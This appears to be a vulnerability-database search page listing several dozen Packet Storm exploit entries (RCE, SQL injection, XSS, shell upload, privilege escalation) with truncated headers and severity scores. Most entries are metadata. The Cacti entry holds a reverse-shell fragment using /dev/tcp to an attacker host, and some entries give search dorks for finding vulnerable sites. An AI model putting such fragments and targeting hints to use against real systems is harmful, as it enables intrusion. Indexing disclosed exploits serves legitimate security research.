Lucene search
K
PacketstormRecent

50738 matches found

Packet Storm
Packet Storm
added 2023/04/03 12:0 a.m.13147 views

Apache 2.4.x Buffer Overflow

Exploit Title: Apache 2.4.x - Buffer Overflow Date: Jan 2 2023 Exploit Author: Sunil Iyengar Vendor Homepage: https://httpd.apache.org/ Software Link: https://archive.apache.org/dist/httpd/ Version: Any version less than 2.4.51. Tested on 2.4.50 and 2.4.51 Tested on: Server Kali, Client MacOS...

9.8CVSS9.6AI score0.97108EPSS
Exploits4
Packet Storm
Packet Storm
added 2023/04/03 12:0 a.m.401 views

AD Manager Plus 7122 Remote Code Execution

Exploit Title: AD Manager Plus 7122 - Remote Code Execution RCE Exploit Author: Chan Nyein Wai & Thura Moe Myint Vendor Homepage: https://www.manageengine.com/products/ad-manager/ Software Link: https://www.manageengine.com/products/ad-manager/download.html Version: Ad Manager Plus Before 7122...

10CVSS8.9AI score0.99999EPSS
Exploits351
Packet Storm
Packet Storm
added 2023/03/31 12:0 a.m.248 views

Textpattern 4.8.8 Remote Code Execution

Exploit Title: Textpattern 4.8.8 - Remote Code Execution RCE Authenticated Exploit Author: Alperen Ergel Contact: @alpernae IG/TW Software Homepage: https://textpattern.com/ Version : 4.8.8 Tested on: windows 11 xammp | Kali linux Category: WebApp Google Dork: intext:"Published with Textpattern...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/31 12:0 a.m.257 views

Judging Management System 1.0 Shell Upload

Exploit Title: Judging Management System v1.0 - Remote Code Execution RCE Date: 12/11/2022 Exploit Author: Angelo Pio Amirante Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.ht...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/31 12:0 a.m.244 views

EQ Enterprise Management System 2.2.0 SQL Injection

Exploit Title: EQ Enterprise management system v2.2.0 - SQL Injection Date: 2022.12.7 Exploit Author: TLF Vendor Homepage: https://www.yiquantech.com/pc/about.html Software Link漏洞影响应用下载链接:...

9.8CVSS9.4AI score0.02798EPSS
Exploits4
Packet Storm
Packet Storm
added 2023/03/31 12:0 a.m.488 views

Cacti 1.2.22 Remote Command Execution

Exploit Title: Cacti v1.2.22 - Remote Command Execution RCE Exploit Author: Riadh BOUCHAHOUA Discovery Date: 2022-12-08 Vendor Homepage: https://www.cacti.net/ Software Links : https://github.com/Cacti/cacti Tested Version: 1.2.2x /dev/tcp/self.rshost/self.rsport &1'" import base64 b64revshell =...

9.8CVSS9.4AI score0.99826EPSS
Exploits48
Packet Storm
Packet Storm
added 2023/03/31 12:0 a.m.742 views

WordPress WooCommerce 7.1.0 Remote Code Execution

Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code ExecutionRCE Date: 2022-12-07 Author: Milad Karimi Vendor Homepage: https://wordpress.org/plugins/woocommerce Software Link: https://wordpress.org/plugins/woocommerce Tested on: windows 10 , firefox Version: 7.1.0 CVE : N/A Description:...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/31 12:0 a.m.244 views

Qubes Mirage Firewall 0.8.3 Denial Of Service

Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service DoS Date: 2022-12-04 Exploit Author: Krzysztof Burghardt Vendor Homepage: https://mirage.io/blog/MSA03 Software Link: https://github.com/mirage/qubes-mirage-firewall/releases Version: = 0.8.0 & 0.8.4 Tested on: Qubes OS CVE:...

7.5CVSS7.6AI score0.21478EPSS
Exploits6
Packet Storm
Packet Storm
added 2023/03/31 12:0 a.m.300 views

rconfig 3.9.7 SQL Injection

Exploit Title: rconfig 3.9.7 - Sql Injection Authenticated Exploit Author: azhen Date: 10/12/2022 Vendor Homepage: https://www.rconfig.com/ Software Link: https://www.rconfig.com/ Vendor: rConfig Version: " sys.exit1 host=sys.argv1 Enter the hostname def getdatahost: print"+ Get db data..." vulur...

8.8AI score0.02685EPSS
Exploits4
Packet Storm
Packet Storm
added 2023/03/31 12:0 a.m.235 views

Judging Management System 1.0 SQL Injection

Exploit Title: Judging Management System v1.0 - Authentication Bypass Date: 12/11/2022 Exploit Author: Angelo Pio Amirante Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/31 12:0 a.m.292 views

CoolerMaster MasterPlus 1.8.5 Unquoted Service Path

Exploit Title: CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path Date: 11/17/2022 Exploit Author: Damian Semon Jr Blue Team Alpha Version: 1.8.5 Vendor Homepage: https://masterplus.coolermaster.com/ Software Link: https://masterplus.coolermaster.com/ Tested on: Windows 10 64x Step...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/31 12:0 a.m.290 views

Bludit 3-14-1 Shell Upload

Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution RCE Authenticated Exploit Author: Alperen Ergel Contact: @alpernae IG/TW Software Homepage: https://www.bludit.com/ Version : 3-14-1 Tested on: windows 11 wampserver | Kali linux Category: WebApp Google Dork: intext:'2022...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/31 12:0 a.m.317 views

Online Pizza Ordering 1.0 SQL Injection

Title: Online-Pizza-Ordering-1.0-Multiple-SQLi Author: nu11secur1ty Date: 03.31.2023 Vendor: https://github.com/oretnom23 Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html Reference: https://portswigger.net/web-security/sql-injection...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/30 12:0 a.m.257 views

Outline 1.6.0 Unquoted Service Path

Exploit Title: Outline V1.6.0 - Unquoted Service Path Exploit Author: Milad Karimi Ex3ptionaL Discovery Date: 2022-11-10 Vendor Homepage: https://getoutline.org/ Software Link: https://getoutline.org/ Tested Version: V1.6.0 Vulnerability Type: Unquoted Service Path Tested on OS: Microsoft Windows...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/30 12:0 a.m.436 views

CrowdStrike Falcon Agent 6.44.15806 Uninstall Issue

Exploit Title: CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token Date: 30/11/2022 Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi Deda Cloud Cybersecurity Team Vendor Homepage: https://www.crowdstrike.com/ Author Homepage...

2.7CVSS4.5AI score0.03672EPSS
Exploits5
Packet Storm
Packet Storm
added 2023/03/30 12:0 a.m.324 views

Inbit Messenger 4.9.0 Remote Command Execution

Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution RCE Date: 11/08/2022 Exploit Author: a-rey Vendor Homepage: http://www.inbit.com/support.html Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html Version: v4.6.0 - v4.9.0 Tested on: Window...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/30 12:0 a.m.242 views

Eve-ng 5.0.1-13 Cross Site Scripting

Exploit Title: Eve-ng 5.0.1-13 - Stored Cross-Site Scripting XSS Google Dork: N/A Date: 12/6/2022 Exploit Author: @casp3r0x0 hassan ali al-khafaji Vendor Homepage: https://www.eve-ng.net/ Software Link: https://www.eve-ng.net/index.php/download/ Version: Free EVE Community Edition Version 5.0.1-1...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/30 12:0 a.m.231 views

WordPress WPForms 1.7.8 Cross Site Scripting

Exploit Title: WPForms 1.7.8 - Cross-Site Scripting XSS Date: 2022-12-05 Author: Milad karimi Software Link: https://wordpress.org/plugins/wpforms-lite Version: 1.7.8 Tested on: Windows 10 CVE: N/A 1. Description: This plugin creates a WPForms from any post types. The slider import search feature...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/30 12:0 a.m.210 views

Book Store Management System 1.0.0 Cross Site Scripting

Exploit Title: Book Store Management System 1.0.0 - Stored Cross-Site Scripting XSS Date: 2022-11-08 Exploit Author: Rajeshwar Singh Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsmsci.zip Tested on:...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/30 12:0 a.m.261 views

myBB forums 1.8.26 Cross Site Scripting

Exploit Title: myBB forums 1.8.26 - Stored Cross-Site Scripting XSS Exploit Author: Andrey Stoykov Software Link: https://mybb.com/versions/1.8.26/ Version: 1.8.26 Tested on: Ubuntu 20.04 Stored XSS 1: To reproduce do the following: 1. Login as administrator user 2. Browse to "Templates and Style...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/30 12:0 a.m.321 views

Uniview NVR301-04S2-P4 Cross Site Scripting

Exploit Title: Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting XSS Author: Bleron Rrustemi Discovery Date: 2022-11-15 Vendor Homepage: https://www.uniview.com/tr/Products/NVR/Easy/NVR301-04S2-P4/ Datasheet:: https://www.uniview.com/download.do?id=1761643 Device Firmware:...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/30 12:0 a.m.326 views

Human Resource Management System 1.0 SQL Injection

Exploit Title: Human Resource Management System - SQL Injection unauthenticated Date: 08-11-2022 Exploit Author: Matthijs van der Vaart eMVee Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html Software Link:...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/30 12:0 a.m.285 views

Inbit Messenger 4.9.0 SEH Overflow

Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow Date: 11/08/2022 Exploit Author: a-rey Vendor Homepage: http://www.inbit.com/support.html Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html Version: v4.6.0 - v4.9.0 Tested on: Windows XP SP3,...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/30 12:0 a.m.282 views

WordPress WP All Import 3.6.7 Remote Code Execution

Exploit Title: WP All Import v3.6.7 - Remote Code Execution RCE Authenticated Date: 11/05/2022 Exploit Author: AkuCyberSec https://github.com/AkuCyberSec Vendor Homepage: https://www.wpallimport.com/ Software Link: https://wordpress.org/plugins/wp-all-import/advanced/ scroll down to select the...

7.2CVSS7AI score0.11344EPSS
Exploits4
Packet Storm
Packet Storm
added 2023/03/30 12:0 a.m.391 views

Ancillary Function Driver (AFD) For Winsock Privilege Escalation

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Ancillary Function Driver AFD for WinSock Elevation of Privilege', 'Description' = %q A vulnerability exists in the Windows Ancillary Function...

7.8CVSS7.8AI score0.65417EPSS
Exploits13
Packet Storm
Packet Storm
added 2023/03/30 12:0 a.m.255 views

Virtual Reception 1.0 Directory Traversal

Exploit Title: Virtual Reception v1.0 - Web Server Directory Traversal Exploit Author: Spinae Vendor Homepage: https://www.virtualreception.nl/ Version: win7sp1rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY Tested on: all We discovered the web server of the Virtual Reception...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/30 12:0 a.m.292 views

Dreamer CMS 4.0.0 SQL Injection

Exploit Title: Dreamer CMS v4.0.0 - SQL Injection Date: 2022/10/02 Exploit Author: lvren Vendor Homepage: http://cms.iteachyou.cc/ Software Link: https://gitee.com/isoftforce/dreamercms/repository/archive/v4.0.0.zip Version: v4.0.0 CVE: CVE-2022-43128 Proof Of Concept: POST /admin/search/doSearch...

6.3AI score
Exploits3
Packet Storm
Packet Storm
added 2023/03/30 12:0 a.m.243 views

Lavasoft 4.1.0.409 Unquoted Service Path

Exploit Title: Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path Author: P4p4 M4n3 Discovery Date: 25-11-2022 Vendor Homepage: https://webcompanion.com/en/ Version 4.1.0.409 Tested on: Microsoft Windows Server 2019 Datacenter x64 Description: Lavasoft 4.1.0.409 install...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/30 12:0 a.m.428 views

Covenant 0.5 Remote Code Execution

Exploit Title: Covenant v0.5 - Remote Code Execution RCE Exploit Author: xThaz Author website: https://xthaz.fr/ Date: 2022-09-11 Vendor Homepage: https://cobbr.io/Covenant.html Software Link: https://github.com/cobbr/Covenant Version: v0.1.3 - v0.5 Tested on: Windows 11 compiled covenant Windows...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/30 12:0 a.m.272 views

DSL-124 Wireless N300 ADSL2+ Backup Disclosure

Exploit Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure Date: 2022-11-10 Exploit Author: Aryan Chehreghani Vendor Homepage: https://www.dlink.com Software Link: https://dlinkmea.com/index.php/product/details?det=dU1iNFc4cWRsdUpjWEpETFlSeFlZdz09 Firmware Version: ME1.00 Tested on:...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/30 12:0 a.m.225 views

Helmet Store Showroom 1.0 SQL Injection

Exploit Title: Helmet Store Showroom v1.0 - SQL Injection Exploit Author: Ameer Hamza Date: November 15, 2022 Vendor Homepage: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html Software Link:...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/30 12:0 a.m.276 views

Forcepoint (Stonesoft VPN Client) 6.2.0 / 6.8.0 Local Privilege Escalation

Exploit Author : TOUHAMI KASBAOUI Vendor Homepage : https://www.forcepoint.com/ Software: Stonesoft VPN Windows Version : 6.2.0 / 6.8.0 Tested on : Windows 10 CVE : N/A Description local privilege escalation vertical from Administrator to NT AUTHORITY / SYSTEM define UNICODE define UNICODE includ...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/28 12:0 a.m.247 views

ReQlogic 11.3 Cross Site Scripting

Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting XSS Date: 9 October 2022 Exploit Author: Okan Kurtulus Vendor Homepage: https://reqlogic.com Version: 11.3 Tested on: Linux CVE : 2022-41441 Proof of Concept: 1- Install ReQlogic v11.3 2- Go to...

6.1CVSS6.4AI score0.05302EPSS
Exploits3
Packet Storm
Packet Storm
added 2023/03/28 12:0 a.m.245 views

SolarWinds Information Service (SWIS) Remote Command Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/proto/amqp/version091' class MetasploitModule 'SolarWinds Information Service SWIS .NET Deserialization From AMQP RCE', 'Description' = %q The SolarWinds...

7.2CVSS7.2AI score0.69546EPSS
Exploits3
Packet Storm
Packet Storm
added 2023/03/28 12:0 a.m.227 views

Moodle LMS 4.0 Cross Site Scripting

Exploit Title: Moodle LMS 4.0 - Cross-Site Scripting XSS Date: 26/10/2022 Exploit Author: Saud Alenazi Vendor Homepage: https://moodle.org/ Software Link: https://git.in.moodle.com/moodle Version: 4.0 Tested on: XAMPP, Windows 10 Contact: https://twitter.com/dmaral3noz Description: A Cross Site...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/28 12:0 a.m.248 views

rukovoditel 3.2.1 Cross Site Scripting

Title: rukovoditel 3.2.1 - Cross-Site Scripting XSS Author: nu11secur1ty Date: 11.03.2022 Vendor: https://www.rukovoditel.net/ Software: https://sourceforge.net/projects/rukovoditel/files/rukovoditel3.2.1.zip/download Reference:...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/28 12:0 a.m.217 views

WordPress Jetpack 11.4 Cross Site Scripting

Exploit Title: Jetpack 11.4 - Cross Site Scripting XSS Date: 2022-10-19 Author: Behrouz Mansoori Software Link: https://wordpress.org/plugins/jetpack Version: 11.4 Tested on: Mac m1 CVE: N/A 1. Description: This plugin creates a Jetpack from any post types. The slider import search feature and ta...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/28 12:0 a.m.196 views

Subrion CMS 4.2.1 Cross Site Scripting

Exploit Title: Subrion CMS 4.2.1 - Stored Cross-Site Scripting XSS Date: 2022-08-10 Exploit Author: Sinem Şahin Vendor Homepage: https://intelliants.com/ Version: 4.2.1 Tested on: Windows & XAMPP == Tutorial http://HOST/panel/fields/add 2- Write XSS Payload into the tooltip value of the field add...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/28 12:0 a.m.215 views

Optergy Proton And Enterprise BMS 2.0.3a Command Injection

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Optergy Proton and Enterprise BMS Command Injection using a backdoor', 'Description' = %q This module exploits an undocumented backdoor...

10CVSS9.4AI score0.93384EPSS
Exploits7
Packet Storm
Packet Storm
added 2023/03/28 12:0 a.m.342 views

BoxBilling 4.22.1.5 Remote Code Execution

Exploit Title: BoxBilling POC Video : https://drive.google.com/file/d/1m2glCeJ9QXc8epuY2QfvbWwjLTJ8Hjx/view?usp=sharing...

7.2CVSS7AI score0.44002EPSS
Exploits7
Packet Storm
Packet Storm
added 2023/03/28 12:0 a.m.222 views

HDD Health 4.2.0.112 Unquoted Service Path

Exploit Title: HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path Exploit Author: Jorge Manuel Lozano Gómez Date: 2022-10-19 Vendor Homepage: https://www.panterasoft.com Software Link: https://hdd-health.softonic.com Version : 4.2.0.112 Tested on: Windows 11 64bit CVE : N/A About Unquoted...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/28 12:0 a.m.317 views

Online Shopping System Advanced 1.0 XSS / SQL Injection / Code Execution

Exploit Title: Online shopping system advanced 1.0 - Multiple Vulnerabilities Discovery by: Rafael Pedrero Discovery Date: 2020-09-24 Vendor Homepage: https://github.com/PuneethReddyHC/online-shopping-system-advanced Software Link :...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/28 12:0 a.m.317 views

SuperMailer 11.20 Buffer Overflow / Denial Of Service

Exploit Title: SuperMailer v11.20 - Buffer overflow DoS Exploit Author: Rafael Pedrero Discovery Date: 2021-02-07 Vendor Homepage: https://int.supermailer.de/downloadnewslettersoftware.htm Software Link : https://int.supermailer.de/smintsw.zip / https://int.supermailer.de/smintswx64.zip Tested...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/28 12:0 a.m.222 views

Tunnel Interface Driver Denial Of Service

// Exploit Title: Tunnel Interface Driver - Denial of Service // Date: 07/15/2022 // Exploit Author: ExAllocatePool2 // Vendor Homepage: https://www.microsoft.com/ // Software Link: https://www.microsoft.com/en-us/software-download/windows10 // Version: Windows 10 Pro Version 21H2 OS Build...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/28 12:0 a.m.257 views

Tapo C310 RTSP Server 1.3.0 Unauthorized Video Stream Access

Exploit Title: Tapo C310 RTSP server v1.3.0- Unauthorised Video Stream Access Date: 19th July 2022 Exploit Author: dsclee1 Vendor Homepage: tp-link.com Software Link: http://download.tplinkcloud.com/firmware/TapoC310v1en1.3.0Build220328Rel.64283nu1649923652150.bin Version: 1.3.0 Tested on: Linux ...

7.6AI score0.04944EPSS
Exploits4
Packet Storm
Packet Storm
added 2023/03/28 12:0 a.m.224 views

Beauty Salon 1.0 Remote Shell Upload

Exploit Title: Beauty-salon v1.0 - Remote Code Execution RCE Exploit Author: nu11secur1ty Date: 10.12.2022 Vendor: https://code4berry.com/projects/beautysalon.php Software: https://code4berry.com/project%20downloads/beautysalondownload.php Reference:...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/28 12:0 a.m.293 views

OPSWAT Metadefender Core 4.21.1 Privilege Escalation

Exploit Title: OPSWAT Metadefender Core - Privilege Escalation Date: 24 October 2022 Exploit Author: Ulascan Yildirim Vendor Homepage: https://www.opswat.com/ Version: Metadefender Core 4.21.1 Tested on: Windows / Linux CVE : CVE-2022-32272...

9.8CVSS9.4AI score0.09095EPSS
Exploits3
Packet Storm
Packet Storm
added 2023/03/28 12:0 a.m.262 views

Label Studio 1.5.0 Server-Side Request Forgery

Exploit Title: Label Studio 1.5.0 - Authenticated Server Side Request Forgery SSRF Google Dork: intitle:"Label Studio" intext:"Sign Up" intext:"Welcome to Label Studio Community Edition" Date: 2022-10-03 Exploit Author: @DeveloperNinja, [email protected] Vendor Homepage:...

6.5CVSS6.5AI score0.05088EPSS
Exploits3
Packet Storm
Packet Storm
added 2023/03/28 12:0 a.m.264 views

Hashicorp Consul 1.0 Remote Command Execution

Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution RCE Date: 26/10/2022 Exploit Author: GatoGamer1155, 0bfxgh0st Vendor Homepage: https://www.consul.io/ Description: Exploit for gain reverse shell on Remote Command Execution via API References:...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/03/28 12:0 a.m.212 views

iBooking 1.0.8 Remote Shell Upload

Exploit Title: iBooking v1.0.8 - Arbitrary File Upload Exploit Author: d1z1n370/oPty Date: 01/11/2022 Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088 Tested on: Linux Version: 1.0.8 Exploit Description: The application is prone to an arbitrary file-upload...

6.8AI score
Exploits0
Total number of security vulnerabilities50738